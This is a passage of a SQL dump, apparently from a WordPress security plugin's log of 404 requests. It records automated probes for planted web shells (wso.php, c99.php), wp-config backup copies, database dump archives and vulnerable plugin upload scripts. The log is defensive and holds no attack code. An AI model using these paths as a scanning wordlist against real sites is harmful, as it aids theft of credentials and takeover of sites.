(0x46a38849f647bf03c9f3ef6624a42da3, 1483463096, '/wp-content/proxy.php'),
(0x238c856ea66bb6ec4c127ec943e72bbd, 1483463155, '/wp-admin/article.php'),
(0x604833aa728922a8835aa9de9420f4a6, 1483463365, '/wp-admin/header.php'),
(0xf52e23822af1651bab0ad7972ff6cd2c, 1483463372, '/wp-admin/option.php'),
(0x579341a7c98aa1fcd7a99520a76aaa44, 1483463402, '/wp-includes/admin.php'),
(0x39f6266fc0961980d4c197e1265b6c7b, 1483463430, '/wp-content/menu.php'),
(0x42cdfbf0949184e51a928ee5f7525878, 1483463562, '/wp-admin/defines.php'),
(0xe7d3151427ff433e86bcbc23ab56f597, 1483463669, '/wp-content/code.php'),
(0x23c8bce150d8dc53fe9df5f1af7b308e, 1483463676, '/wp-content/article.php'),
(0x9134e56b629a5e34617c7c6776678b05, 1483463741, '/wp-content/gallery.php'),
(0x8337e42cbe73e586d803a8ebbf97d91a, 1483463786, '/wp-content/inc.php'),
(0xc8629421a67a7a425c9a7f21f159e367, 1483463819, '/wp-content/file.php'),
(0x2cfb92d1611f9f912ba087b8fb0355d1, 1483463865, '/wp-admin/info.php'),
(0x91140158d861cae7b57299e3150645e3, 1483463989, '/wp-includes/code.php'),
(0x90669aa4bfb1bad04f95c6b81dc34377, 1483464029, '/wp-content/config.php'),
(0xa6c90a9729e46d2de192eedcf4f1ad39, 1483464031, '/wp-content/alias.php'),
(0x08fa7a3cbfa65fd1a357fac87f5115ab, 1483464088, '/wp-includes/defines.php'),
(0xea2f2a3db064837012c2a8b6a7ec3b03, 1483464132, '/wp-admin/javascript.php'),
(0xc49206ef2c2ce4a51712791341f9671a, 1483464219, '/wp-admin/utf.php'),
(0x08c0c88b4ec8bfc506b2ae83a2de0474, 1483464221, '/wp-admin/gallery.php'),
(0xae3bc791cdbec1c5140eb48e79236fd6, 1483464230, '/wp-admin/help.php'),
(0x2eb8b6112032c46feb4b80d6478989e5, 1483464239, '/wp-admin/code.php'),
(0x7acc58a5b59e1c3562a91bc2d001012a, 1483464323, '/wp-admin/footer.php'),
(0xdc8dafd5ca7f899b2fc51c3d32951150, 1483464327, '/wp-includes/javascript.php'),
(0xb17443bd5616725e6591e75ddc869463, 1483464355, '/wp-includes/title.php'),
(0x9ac4b296f3613d654fccfe22615aca61, 1483464424, '/wp-content/ini.php'),
(0x15cd6b37bc788b8488ee7275b8d8f5a6, 1483464662, '/wp-admin/diff.php'),
(0x2f76f2d324235ce9b6609b5e50f474b0, 1483464719, '/wp-admin/press.php'),
(0x80aec2c00dee4dee5feb0d8ac680e552, 1483464764, '/wp-content/press.php'),
(0xbc02988e34d73839deadd84554817e3f, 1483464789, '/wp-includes/options.php'),
(0x82b57c41696cdae030a1cdd2cd495516, 1483464806, '/wp-includes/gallery.php'),
(0xcfbcb46d4946c1f4e5dca3a5ac474eb0, 1483464828, '/wp-admin/view.php'),
(0x833b5258f1fbf589a78d3d2289f5a7ce, 1483464850, '/wp-content/blog.php'),
(0x9848495dba63e88c8f7271b948b315c1, 1483464856, '/wp-admin/test.php'),
(0x6e3840c1d67f824df68289b2ca666bc7, 1483464891, '/wp-admin/global.php'),
(0xdd9bc9b08c6d7a8cb8508fb0566b84a2, 1483464932, '/wp-includes/menu.php'),
(0x1c44118db13b812c1c1b3d837b99b706, 1483464980, '/wp-admin/search.php'),
(0x523b64e09aa0fc88a832477e05e03076, 1483465003, '/wp-admin/ini.php'),
(0x5dfa2e53ee2aba490637a9dc902f4643, 1483465016, '/wp-admin/system.php'),
(0x92360c97be9ed3da5dcd98d65455f6b9, 1483465261, '/wp-admin/dirs.php'),
(0x2f298e5d3f0c070c64d94da4e7b27795, 1483465264, '/wp-content/functions.php'),
(0xd6caf8e99f41f0139dc6a3c567a3d85f, 1483465283, '/wp-content/javascript.php'),
(0xebd384dc92ce5e177e87f1372221588d, 1483465405, '/wp-admin/xml.php'),
(0x0f7aa24f2d8cf61bce1b75df6dbd2b1f, 1483465468, '/wp-includes/config.php'),
(0xa308563d6f05bf87665aa7a290561919, 1483465477, '/wp-content/admin.php'),
(0x569a9273a46f018415d93655043c1208, 1483465506, '/wp-content/footer.php'),
(0x968a1b59fd3dca17fc98554066d1e8f6, 1483465532, '/wp-content/lib.php'),
(0xde6b649724240584da00964c73a04c1d, 1483465540, '/wp-admin/general.php'),
(0x14fb8f53d916c7b9cb217265b9297645, 1483465649, '/wp-includes/ini.php'),
(0x7b57ea69aeccc69499a5ebb4892cd1f4, 1483465691, '/wp-includes/files.php'),
(0xe7b0fb78c3536bf48eab7a83940a729a, 1483465742, '/wp-includes/inc.php'),
(0x92d5918e9baf7fa5bc9b5c4cc7695f97, 1483465798, '/wp-includes/alias.php'),
(0x705c7186afdebafe09f6cbfd337601d1, 1483465827, '/wp-content/dump.php'),
(0xc9e62462fcb58b3e176782278fc4c7e6, 1483465878, '/wp-content/db.php'),
(0xe8ac3a7545f4a815887cbc94f40a82d0, 1483465922, '/wp-includes/view.php'),
(0x86c2cbf2532372618c0fa777b53a9948, 1483465964, '/wp-includes/model.php'),
(0x572809a1fb171f019745278364536470, 1483466104, '/wp-includes/article.php'),
(0xa3bad9fc62ddc76617d1be524632b6b2, 1483466111, '/wp-includes/blog.php'),
(0xed9d0967fc844317c4177f4ca098dd22, 1483466123, '/wp-content/system.php'),
(0x30baf08e65699173ef62e3461b5c1536, 1483466186, '/wp-includes/file.php'),
(0x44d8491d654f46fd88d1404fab1bb6c9, 1483466277, '/wp-admin/files.php'),
(0xd0d6ae595b17982e8654176c5d14f189, 1483466408, '/wp-content/test.php'),
(0x7e22df1512406aedc608a77bfe8e29ee, 1483466427, '/wp-admin/error.php'),
(0x55c09d2224cde0bdbd9d2d294b792a52, 1483466436, '/wp-includes/utf.php'),
(0x95476217d518887d0e34ce615d3ded81, 1483466436, '/wp-content/session.php'),
(0x86ae51430c2b39f2ceefbf1c2ba92be2, 1483466561, '/wp-content/start.php'),
(0x0dd4bdecd3bad4a5b4d174ccb8640a86, 1483466610, '/wp-content/object.php'),
(0xe15ed0b48dc352d261981532082534c1, 1483466615, '/wp-admin/template.php'),
(0x59e27a4f2f65c483785e70bffbb4e1e3, 1483466622, '/wp-content/title.php'),
(0x699214a6ed883ab94144b0ac440cd38a, 1483466644, '/wp-includes/include.php'),
(0x02bd91a1bf6beb87f356d6b382c3eae2, 1483466726, '/wp-includes/xml.php'),
(0xc310bbd26dbbd1e3ba29e1d6d1b29f5d, 1483466735, '/wp-includes/footer.php'),
(0xb389716e6c1647f97e3e51e68cce7363, 1483466796, '/wp-includes/general.php'),
(0x0d8accff5825a1309259bd66c70d717d, 1483466861, '/wp-admin/functions.php'),
(0x5ebb9aa3427f47dd0266796acc789057, 1483467051, '/wp-content/header.php'),
(0x5424e3c987971eb91b8b0a7e9c38e4a9, 1483467083, '/wp-admin/session.php'),
(0xe17e231c6b750d43807f9a28c210d8e6, 1483467148, '/wp-includes/dirs.php'),
(0x2cf0611ae44e4dfaf58e8db348dfcf08, 1483467149, '/wp-includes/start.php'),
(0xdeb85f166cda35d90ff1f04dd8452e5c, 1483467197, '/wp-includes/press.php'),
(0x135f2bbe4d3019fd262d311eef6bfcb6, 1483467199, '/wp-content/xml.php'),
(0x5eeeb6f71b0a0c3adcf352ea71cdfe47, 1483467215, '/wp-content/search.php'),
(0xe3cd4c41a2b5c0dba785bda8bbd726a1, 1483467232, '/wp-content/dir.php'),
(0xc96a2e7774fe4a52c8f4b3705198a16b, 1483467427, '/wp-content/model.php'),
(0x81d0811d47e9bc6ff364d6dc4825d7c5, 1483467467, '/wp-admin/lib.php'),
(0xea41104d986476d3997dbc3ac9449a68, 1483467625, '/wp-content/view.php'),
(0xe011cac1858ae3ee9bb8c656dcd68be4, 1483467631, '/wp-content/files.php'),
(0x53230af6e8292f8d494d8859b530eb08, 1483467655, '/wp-includes/system.php'),
(0xc0b08506b99629dfa811e115d98e01ed, 1483467692, '/wp-admin/blog.php'),
(0xaa1b912a6139f0eeb660a2d8308155e7, 1483467695, '/wp-includes/proxy.php'),
(0x54fe91e93e22790ab493f8566972c580, 1483467723, '/wp-admin/title.php'),
(0xdf8f48ec40dfae5e73892c0da501d6c2, 1483467888, '/wp-admin/sql.php'),
(0xb40469b7cb4cf10dc72cae19458d0311, 1483467904, '/wp-admin/inc.php'),
(0xa44be34c43a5c768622b7af5ca873113, 1483467919, '/wp-admin/stats.php'),
(0x981d5b421c41250adecfdb33f34f7a89, 1483468149, '/wp-includes/lib.php'),
(0x36acfcb50626cf24f5db01059b16d8ea, 1483468310, '/wp-includes/stats.php'),
(0x67ca0b0a18d93e92d397c9180f71a212, 1483468337, '/wp-admin/user.php'),
(0xd4a59f7ce96e751e4986cf86478e4aed, 1483468551, '/wp-content/login.php'),
(0xa2902fec6b22d879393c8b6d1aa36d94, 1483468566, '/wp-includes/help.php'),
(0x8ab8eee3b53038df6e49af35db49541d, 1483468590, '/wp-includes/themes.php'),
(0x28c7106185539dddaaac135edf7b3a53, 1483468656, '/wp-content/list.php'),
(0x7ce78d95044895560b1ca17b24fc0284, 1483468667, '/wp-includes/list.php'),
(0x726adec461b1a56647701f2f93917eb5, 1483468725, '/wp-content/defines.php'),
(0xb70f9e26c0ed6a07f6b7e3320f8f0050, 1483468958, '/wp-includes/global.php'),
(0x5f740d42ea65bda06a3db8ffa11e1df8, 1483469037, '/wp-includes/dump.php'),
(0xc7162f8be28f8eeca11f09936ab1bfe5, 1483469052, '/wp-content/themes.php'),
(0x053f497e568aeee9b02e0680d2cfd3fb, 1483469055, '/wp-includes/login.php'),
(0x618489aa2d04185e293d82cf39b2496c, 1483469095, '/wp-admin/db.php'),
(0x6e3af17011f9705218022bf2a8b477b0, 1483469151, '/wp-content/plugin.php'),
(0x7192a83d3784eba178779255df713eff, 1483469165, '/wp-content/option.php'),
(0x695c4267cf6b830cf19f84e786c4387c, 1483469261, '/wp-admin/list.php'),
(0x8da49bbdb830d154918c64a248ca6b2c, 1483469377, '/wp-content/info.php'),
(0x68477ec69e84dffd225fdb27f351ce2c, 1483469377, '/wp-content/options.php'),
(0x8a9306dbd1cbe1a2f6d0202fe7f8e307, 1483469387, '/wp-content/global.php'),
(0x7d20397ba20b933b5983e3310be44984, 1483469586, '/wp-admin/login.php'),
(0x64923fcdced22be3e4ab7e473be37b0a, 1483469615, '/wp-includes/info.php'),
(0x1987eadbb6248c299c275d17389eee13, 1483469669, '/wp-content/stats.php'),
(0xe7a50d8a942d858fcbd6ddc732bc5ac5, 1483469692, '/wp-includes/db.php'),
(0x8e6a2628a7b638820b69cafdcfaef2b8, 1483469793, '/wp-includes/css.php'),
(0x08a49b61480fcdbfb069d3d06cf5f5c8, 1483469990, '/wp-admin/dump.php'),
(0x77da1c866ff193547939dda5e759289e, 1483470317, '/wp-admin/model.php'),
(0xe4cfc9e24411f6adc7520ee3e48ed214, 1483470637, '/wp-includes/error.php'),
(0xc422e759b965a7d69afacda740c35d01, 1483470792, '/wp-content/help.php'),
(0x85d03036aeba2124aa26f3452996e546, 1483470819, '/wp-admin/plugin.php'),
(0x55e5f95ad37d238db4188688f74b094e, 1483470904, '/wp-includes/page.php'),
(0x061e0b25efedfd35edbc71186e575bb2, 1483486122, '/logo_img.php'),
(0x9c26d55680ed9a48a88970083146c4e0, 1483486122, '/wp-admin/css/logo_img.php'),
(0x69c3d22c099fc19e23bb4cd73fa0862f, 1483486132, '/wp-content/languages/logo_img.php'),
(0x868973ffc4e54a64da4fe308aa65cffd, 1483486132, '/wp-admin/user/logo_img.php'),
(0x7ef9865978426ca00497eb102bb6cb4c, 1483486136, '/wp-content/plugins/logo_img.php'),
(0x9d6f35251ea570a87145912016bb531e, 1483486136, '/wp-content/themes/logo_img.php'),
(0x9424c1339787e609448d2b5d2ed93e70, 1483486136, '/wp-includes/css/logo_img.php'),
(0x0edfb14f5ca52d3aa0453d0c05f517e8, 1483486136, '/wp-content/uploads/logo_img.php'),
(0x96a82d6b0f283da11b44eb309eaa356c, 1483486136, '/wp-admin/logo_img.php'),
(0x19113d1f239e5663e7a1b7ce5420b5d6, 1483486136, '/wp-includes/js/logo_img.php'),
(0x1d6e24648a02515377cb3a80e771e37a, 1483486136, '/wp-includes/images/logo_img.php'),
(0xfd6d41d859d84ea5b3fd734ef68be943, 1483486136, '/wp-admin/maint/logo_img.php'),
(0x2c2a8985858271afc8411f32dd02e384, 1483486136, '/wp-content/upgrade/logo_img.php'),
(0x697d97d87f7ab81c58c7c961790265cc, 1483486136, '/wp-admin/network/logo_img.php'),
(0x1963a6c07870ede04474e077881340bb, 1483486136, '/wp-admin/includes/logo_img.php'),
(0xc96377746a4f5ff3243ffc8d73a12303, 1483486136, '/wp-admin/js/logo_img.php'),
(0x57d25c21d605f533eaa22abc18703914, 1483529472, '/CHANGELOG.txt'),
(0xc5f299fdb9415d42fd4ec94998e8ac7e, 1483542110, '/wp-cros.php'),
(0xc5c60b19317aa07cc0fda785c843f235, 1484052605, '/wp-config-backup1.txt'),
(0x4992e60b761edfdb4349314fcc23f23f, 1484052607, '/wp-config%20fix.txt'),
(0xe728c949db9016478a757103253bb63a, 1484052609, '/wp-config.bak'),
(0xbc4e39c809bc9c279c6c970d3e8d57ff, 1484052621, '/wp-config.phpOLD'),
(0xa0d14a0b43e8f6c5d66aa123ea9d1259, 1484052629, '/wp-config.txt'),
(0xd283f1f62f58662c6f53f8e860e88680, 1484052634, '/wp-config.phpa'),
(0xc0b2b4f90dad30704cadd2929485de89, 1484052642, '/wp-config.old'),
(0xe594597e63ad17d35d6e7abb4600e8fb, 1484052646, '/wp-config.php.txt'),
(0x8debb9154d21e0c5084487f7e1f96657, 1484052649, '/config'),
(0x8a44ecdf47b2813403eed5b035d1ebdc, 1484052650, '/wp-config.'),
(0x3430934cf56ad6591685de8ba094bc17, 1484052654, '/wp-config-backup.txt'),
(0x2f143a8e90e4ec9e117a17dce3e5bae0, 1484052656, '/wp-config-backup'),
(0xe3521403c9f9323e79150797b17ae52a, 1484052659, '/config.bak'),
(0xcba9b2530eb5f09e4b8d89251087ef47, 1484052661, '/config.old'),
(0x859c357ecc9426dc2c1aef5a29b903ac, 1484052663, '/config.php~'),
(0xd1202826d31fdc05ba63cc55b1f87a30, 1484052670, '/wp-config.data'),
(0x86aef86b7d5d1a4da5bac68458397e22, 1484052683, '/wp-config.php~~'),
(0x8ccdd58ae44c38a7017ed8ba6ffc00a7, 1484052689, '/config.'),
(0x59b5d0251d24a79573f866b6cf4b1790, 1484052691, '/wp-config.phpold'),
(0x2e3e1d9cd7fd4329c15a98d49caa7156, 1484052696, '/wp-config.phpb'),
(0xdbe182a0d1354a847afce92f5bf0c47c, 1484052726, '/wp-config.php-n'),
(0x77e0225449157ee7ad90ae8a9d4539d4, 1484052727, '/wp-config.phpnew'),
(0x5e24237b4ca74203cf38420f597c6e7c, 1484052736, '/wp-config.cfg'),
(0x1589d2fc7dd7764a6c332b0154b3e424, 1484052740, '/config.php~~'),
(0x44a7bde3c1aa2260b4efd68cd9c822b4, 1484052749, '/wp-config.php~~~'),
(0x071c5faf15c1a43d471e4d27e310fddf, 1484052753, '/wp-config.phptmp'),
(0x4b1723cedb650e843b617fc5fa984ff2, 1484052767, '/wp-config-sample.php~'),
(0x03d44ba7ca24a32e1f74ce6b03613c50, 1484052795, '/wp-config.php_'),
(0x0325498e850564a98873b4522f65f941, 1484052821, '/wp-config.local.php'),
(0xe411ea300f3ef683a917d7e94164796f, 1484052824, '/wp-config.html'),
(0x57d7b7860b9e4b4e2afc88409c749090, 1484052826, '/wp-config.htm'),
(0x630ed78defd13eaee7e04682fb3f2f66, 1484054673, '/wp-includes/pomo/foolcar.php'),
(0x2ab54083794be82a47937fdb0668ff8f, 1484054786, '/wp-content/plugins/foolcar/foolcar.php'),
(0x3f7e44cea2f5ae9ac7f5b029b09e7684, 1484055289, '/backup.php'),
(0x5e34be9e375fce9e475261f17a035e7b, 1484067603, '/wp-content/themes/twentyfourteen/system.php'),
(0xa1bd5b463e78c48a3eca1e1c75241928, 1484067645, '/wp-content/themes/bootcake/'),
(0x16ee3acd054c87d1a5e78f3be7e34d9e, 1484075238, '//yt2.php'),
(0x2744b36a6d4e4fe4ee22953162c90936, 1484075262, '//ytt.php'),
(0xcce1659e66d862ceb054aab0863de15d, 1484107770, '/wp-content/plugins/showbiz/release_log.txt'),
(0xc7177657b9c259b026778cba4601d89a, 1484107773, '/wp-config.php.save'),
(0xf0d25d49d1b99c60842ac88724fb55f9, 1484107774, '/wp-config.php.swp'),
(0xad878a9143062ead8382417634ff3075, 1484107774, '/wp-config.php.swo'),
(0x92d0f070d5bf00f950fa18dd52078e28, 1484107775, '/wp-config.php_bak'),
(0x2c7cc3d848ced1dd3d77d2bde8f722a2, 1484107777, '/wp-config.save'),
(0x8e034820a7c96d5f6bb0c7a28455fd7f, 1484107778, '/wp-config.php.old'),
(0x16c87ecdb6a352688ac844163c1b8b08, 1484107779, '/wp-config.php.orig'),
(0x68c4220fa9107f0fbf46f504bc60761e, 1484107780, '/wp-config.orig'),
(0x4e34d200cca60a17924fc1031e5f6c84, 1484107780, '/wp-config.php.original'),
(0xf186651266e8ff5a947e02f07c9ce744, 1484107781, '/wp-config.original'),
(0xb0a38313342a77b3c505a8045bc2cd91, 1484107782, '/wp-content/plugins/ninja-forms/readme.txt'),
(0x776e44924ab96df2d9f2a17a949c1775, 1484191414, '/wp-content/plugins/blaze-slide-show-for-wordpress/js/swfupload/js/upload.php'),
(0x9b5f3f83560fc59631f7a31c27920081, 1484310385, '/wp-content/plugins/smart-slide-show/js/swfupload/js/upload.php'),
(0x5633d01cdcc75631eeaf250371c13f25, 1484323487, '/wp-content/plugins/unattached/wso2.php'),
(0xe42a8b319a9dbb8d7478a0637c9a40bf, 1484323489, '/wp-content/plugins/unattached/wso2.php.suspected'),
(0xa9389732262593c5ebeb9f5c7c8f7fb9, 1484323490, '/wp-content/plugins/unattached/wso.php'),
(0x3f11758ae098c3d352f15629b5dacd5d, 1484365786, '/wp-content/plugins/libravatar-replace/config_all.php'),
(0x1d9dc3e476806fd8b5f8e2b00e3b13f3, 1484371757, '/images/logo_img.php'),
(0x16478c88232e7e22f3e77bac049d437b, 1484372663, '/wp-content/plugins/libravatar-replace/libravatar-replace.php'),
(0x0248f74272f4fabbd53fcc3749d97d2f, 1484460983, '/wp-content/plugins/wp-3dbanner-rotator/js/swfupload/js/upload.php'),
(0xd05f74ba70d2b5bfc7bc2bdf999f51ec, 1484610298, '/wp-content/common_1.php'),
(0x95639447dcdfaaba50327e56f4435b79, 1484673021, '/wraper.php'),
(0xbf81a7a2afd7c4eb11bd21adea8dace1, 1484673085, '/notlce.php'),
(0x897538d8e2f5e01a4fdd98821907e188, 1484673358, '/book.php'),
(0xbf2de025db2598a380d092486fd60c9f, 1484673954, '/shwrk.php'),
(0x92e3caed7008565470d50241cf165056, 1484673996, '/lndex.php'),
(0x61270537272bc52a8dee062eb249efa6, 1484674261, '/api.php'),
(0x636e872196b3a6efba2741637d07e07f, 1484738970, '/wp-content/plugins/html5avmanager/license.txt'),
(0x7f689d7c2d1d5a4d23b0343821c1bc65, 1484944347, '/blog/wp-content/themes/sketch/404.php'),
(0xd5ee374891406c4779d5124e533c0019, 1484944348, '/wordpress/wp-content/themes/sketch/404.php'),
(0x59daef887d40726300a8659b94112a47, 1484944349, '/wp/wp-content/themes/sketch/404.php'),
(0x8e13add0808b98d78bccb2b32ff4ef1b, 1484944550, '/shell.php.suspected'),
(0x7cdf8ec2468ac28c00a6da5a297452dc, 1484944569, '/tmp.php.suspected'),
(0xeced8c4b8c195770b00a150ba4721447, 1484944572, '/bubus.php'),
(0x62fb3db133cdfe46c4930f6f3a509cf8, 1484944574, '/bubus.php.suspected'),
(0x989245aeb82def6250b72f263eb08422, 1484944579, '/wso.php'),
(0x26a13536fb45ee3719082f8ad8687106, 1484944586, '/wso.php.suspected'),
(0x03ad8625d4b834c1a5a0d36774f5d99a, 1484944610, '/wso2.php'),
(0x56d307429da9a9a40d30aa87c55570b4, 1484944632, '/wso2.php.suspected'),
(0x3facfdf002c0718c9ac14de951a5804e, 1484944635, '/c99.php'),
(0x8fc1700486a0564ccca535228d2f2e81, 1484944638, '/c99.php.suspected');
INSERT INTO `www2_wfNet404s` (`sig`, `ctime`, `URI`) VALUES
(0x2448ff1dc8b49d7d02f02fb47e119650, 1484944643, '/login.php.suspected'),
(0x7755d0903df12b5443f129ec2764bbf8, 1484944646, '/.images.jpg/login.php'),
(0x02b78ab2b4528f2a2d0b47cbecb9166e, 1484944657, '/.images.jpg/login.php.suspected'),
(0x9875eefb54875a1377ff50efa5957457, 1484944661, '/1111.php'),
(0x4f3ab84ab34885179cb934434452d38c, 1484944664, '/1111.php.suspected'),
(0x52f9383cbc1b221c2a017ffaf161b5ab, 1484944666, '/1.php'),
(0xe8eb25b02c479af48aa73c46b8f324be, 1484944670, '/1.php.suspected'),
(0x485dbc8a0688787924d099435d52eaa7, 1484944674, '/mko.php'),
(0x52a9e08d81966e1fb552c159067480f6, 1484944684, '/mko.php.suspected'),
(0x3d94116d7d31856da09ed742aae47c78, 1484966303, '/wp-content/plugins/mm-forms/includes/doajaxfileupload.php'),
(0x453c176d3ce2820331a6fd276f17a1ea, 1484966428, '/db_backup.sql.7z'),
(0x38a2891979110b07ce2a884a1c3bfbc1, 1484966585, '/dump.7z'),
(0xd40866bc297cd3d4c983d1a04445dafb, 1484966616, '/backup.sql.gz'),
(0x31c0b5a4ed241f50cf82f1bbca2e65c3, 1484966900, '/site.sql.tar.bzip2'),
(0x6c135ead20db12b84546725d9c88af01, 1484966943, '/www.sql.7z'),
(0x03ed6df97ef28b9992ee998f3d4caac4, 1484966975, '/db_backup.7z'),
(0x2f8a7ace0175477cf46e7c22c7942748, 1484966986, '/db_backup.tgz'),
(0x31f1d7289c06de76cb541228c9d24f97, 1484967069, '/upload.sql.tar.gzip'),
(0xb381e5afa22d92a1e2d8dde998549faa, 1484967202, '/1.sql.tar.bzip2'),
(0x1d5ca0e2f5860d482cc3c334b6b38048, 1484967206, '/upload.sql.rar'),
(0xd3fc33c8a46cae86205957e2b2514074, 1484967207, '/home.sql.tar.gzip'),
(0x7248a6c59dab09a20e88bd20f9886743, 1484967408, '/dump.sql.tgz'),
(0x9f73f76ceea10d02399751afc805bc23, 1484967453, '/site.sql.gz'),
(0x13440b63bac365a36d40f701ce2facdf, 1484967485, '/data.sql.gz'),
(0xaf85bdce40eaf9d925d6692374dd4df7, 1484967502, '/db_backup.tar.bzip2'),
(0x1acdd6a44ce99713916c8ecb15bfe3df, 1484967536, '/www.sql.gz'),
(0x3d97920c87d20bf19642a3eebc328a73, 1484967586, '/upload.sql.tar.bzip2'),
(0xc877b90ed62c48ab7401f105a3b1a610, 1484967813, '/dump.rar'),
(0x73b531287d2a7208544250b80caa5f1a, 1484967956, '/db_backup.tar.gzip'),
(0x9ab06fa8135f346b49472079b12eb19d, 1484967958, '/db_backup.sql'),
(0xbf360dbad29fc797ee2a612d8825b540, 1484967970, '/db_backup.sql.zip'),
(0xa94ec5f2a3f89308e218bab0e677a508, 1484968092, '/site.sql.tar.gz'),
(0xd7ad248cbecf9fe9e1d7c696a9943f9c, 1484968240, '/sql.rar'),
(0x7cef6ced926d659feeebf18aaf667c22, 1484968242, '/dump.sql.rar'),
(0x3b570330522feea8eb33f9f97c4b558b, 1484968249, '/www.sql.tar.bz2'),
(0xc3cb3388640b1cfc6736ee6d491c4d7d, 1484968394, '/home.sql.tar'),
(0x1b34251d56e8777147c17d30cb78b459, 1484968461, '/home.sql.tgz'),
(0x4c94669899b01810fad2e2d72c29c938, 1484968543, '/mysql.sql.tar'),
(0x6fcd7b1ccf53623c6bd6bcd1b3cce49f, 1484968602, '/db_backup.tar'),
(0xb9719333941e226e9f53561a43751981, 1484968606, '/upload.sql.bz2'),
(0x210d33b3a7697bbb3df352d6328031b0, 1484968630, '/db.sql.tar.gzip'),
(0x8ba4569f715810dde08eb1fc1c8cde2a, 1484968638, '/home.sql.bz2'),
(0xa2c2c7d0534f3fd63b109d638fc26583, 1484968643, '/mysql.bz2'),
(0x9b5d6fffd8d816adfc18be0ead1d92ee, 1484968652, '/dbadmin.bz2'),
(0x3866e3a463fb291a9b0763844dbd832d, 1484968653, '/www.sql'),
(0x9e435b9e5b063a7b29bbc4fa793a3d19, 1484968669, '/dbdump.sql.tar.gzip'),
(0xfea4e56ff3010f10cb37495deeead8d2, 1484968673, '/public_html.sql'),
(0x228e39003b746b141bc9e186bbbc514d, 1484968736, '/dbadmin.tar.bz2'),
(0xc619c1813d52e839fd06e2271e73db86, 1484968761, '/web.sql.gz'),
(0xcea257f9202f150ce3e6bae18c27ed3c, 1484968780, '/dbase.tar.gz'),
(0x2d106964e4b48ed9c627eab00ed1c33e, 1484968820, '/dbase.sql.tar.bz2'),
(0xdfef4f4942a2a7a4f3fd31cfe5683bd2, 1484968824, '/upload.sql.tar.gz'),
(0x403d46561f944bd3328749dc6c774b80, 1484968834, '/db_backup.sql.tar.bz2'),
(0x9f36d360f2712d8a50c74e36e0dac793, 1484968874, '/sql.sql.rar'),
(0x697550b806a8f013ffa74be28be76f3d, 1484968933, '/site.sql.tgz'),
(0x2b33255a624cf7143b201a1f6c983b5a, 1484968957, '/backup.sql.tar'),
(0x1c8751c5afa419ca56b6f95344a82d4f, 1484968975, '/1.sql.tar'),
(0xd3fb766427e95ca4d9a3b76f3bf9d12a, 1484968998, '/dump.sql.tar.bz2'),
(0x69c7b1c50e186c22c19d0c21c614219f, 1484969029, '/dbadmin.zip'),
(0xec7bff355c548354be1cc8bccf9a961c, 1484969052, '/temp.sql.tar.bz2'),
(0xa2be777a58209c5150b0ae82a32e462e, 1484969128, '/www.sql.tar'),
(0x127d97a93053a1de34097cf91565d444, 1484969134, '/mysql.tar'),
(0xec9e430a790484d5c0e909554685b49e, 1484969160, '/upload.sql.gz'),
(0x3eddda4f43ea3c4828fd92b905f38226, 1484969188, '/home.sql.tar.bzip2'),
(0x707ae1358b2437041baabbb3daf4e5aa, 1484969206, '/backup.sql.tar.gz'),
(0x2eafd40e581f302f14d97ff0d342117a, 1484969216, '/mysql.sql.tar.bz2'),
(0x596fcdd45efd0f395b20384130fee2b2, 1484969242, '/dbdump.tar.gzip'),
(0x9669c8b95771059fcc62f9ec6d0a02a7, 1484969258, '/db_backup.sql.bz2'),
(0xba9c0c0a013e1c9aa474d8a302708dbb, 1484969303, '/data.sql.sql'),
(0x047bdaba6ac6087de5126ec44e6cd348, 1484969310, '/dump.tgz'),
(0xdf73764b8215426deaee3a21ac0f178e, 1484969319, '/dbadmin.sql.zip'),
(0xaa89c7eb3f6d3b049775a4a21f14ec53, 1484969331, '/www.sql.tar.gz'),
(0x3866f74b1cc5e6170da398c0f1841893, 1484969354, '/dbase.rar'),
(0x8f6cad8d5850d4624c1dc6a8c22098b1, 1484969362, '/db_backup.rar'),
(0xa3e8478c145cbe263cf94edb89942754, 1484969369, '/home.sql.tar.gz'),
(0xba9ea45821b4e80cf5cefa9839603b46, 1484969371, '/mysql.sql'),
(0x20897ab471b9dc8b3931a3e7ddef488e, 1484969380, '/web.sql.7z'),
(0x67901b9c875c90ce8abd09d316850d9a, 1484969403, '/css.php?alabama=1'),
(0xacfbb0b5f512ddf10dfd4286c04b1a8c, 1484969415, '/db_backup.sql.tar.bzip2'),
(0x32b901f387caea3b7615c36642771069, 1484969470, '/dump.tar.bzip2'),
(0x35fe19c414b504956f4176e47f59a4e4, 1484969526, '/backup.sql.tar.gzip'),
(0xc8b645299a13ec7b8485a20e08450be0, 1484969558, '/db_backup.sql.sql'),
(0x4a7a7985a8dfe664133923452ea2b77e, 1484969657, '/temp.sql.bz2'),
(0xae0b29f862219c579c96b3f84ff84491, 1484969676, '/dump.sql.tar.gz'),
(0xa89e0e9fe3dea17738db920cd394e068, 1484969684, '/db.sql.bz2'),
(0xcd765a26e9ebc2c7ae00af2c556d868d, 1484969697, '/dbdump.sql.tar.bz2'),
(0xb2db8f7c10421b509378cc33b06bb3b3, 1484969714, '/api.php?alabama=1'),
(0x4f55a0f9f4de502c43176b7db3994463, 1484969716, '/www.sql.zip'),
(0x6ff77f59294c7e5172cc763f56807b98, 1484969743, '/mysql.sql.zip'),
(0xac21eb2ec0af0603b91cb3ac49d6fa9a, 1484969773, '/book.php?alabama=1'),
(0x08c94990566e93e4aa31712ec4be61c6, 1484969800, '/home.sql.zip'),
(0xc7442e1cac2d99e54e78d4707f243020, 1484969826, '/mysql.7z'),
(0x3a9336c1078e0b08eb01ef9918783050, 1484969834, '/upload.sql'),
(0x47cfb83d79dfe94d3e6ac43cb819570b, 1484969872, '/db_backup.sql.tgz'),
(0x0248bae617a73e5d17196cb3d4a243d9, 1484969873, '/www.sql.tar.bzip2'),
(0x1fc02069fc9c23cdc1adf8f144dc93c9, 1484969879, '/dbdump.sql.tgz'),
(0xe692e2da388bfcfc4e2546ba6ee7ebfb, 1484969882, '/upload.sql.tgz'),
(0x43a825fa8f36c482771fc889583fd61d, 1484969894, '/page.php?alabama=1'),
(0x7e53bd78dc785c3bb407b003ab7340ef, 1484969922, '/users.sql.tar.gzip'),
(0xfd46162ded4297e2c4fa1187ab014054, 1484969977, '/1.sql.gz'),
(0x0569926bdeb499ef66108f217f0f94d5, 1484970099, '/mysql.sql.tar.gzip'),
(0xafaf2fc32cdee6e0d1c54c650b756396, 1484970142, '/lndex.php?alabama=1'),
(0x739c2f38a4964467336dbfcbd0fa4db7, 1484970171, '/web.sql.zip'),
(0x73445f24f25d5afb4cb7628f0ff27aa7, 1484970171, '/db_backup.sql.tar.gz'),
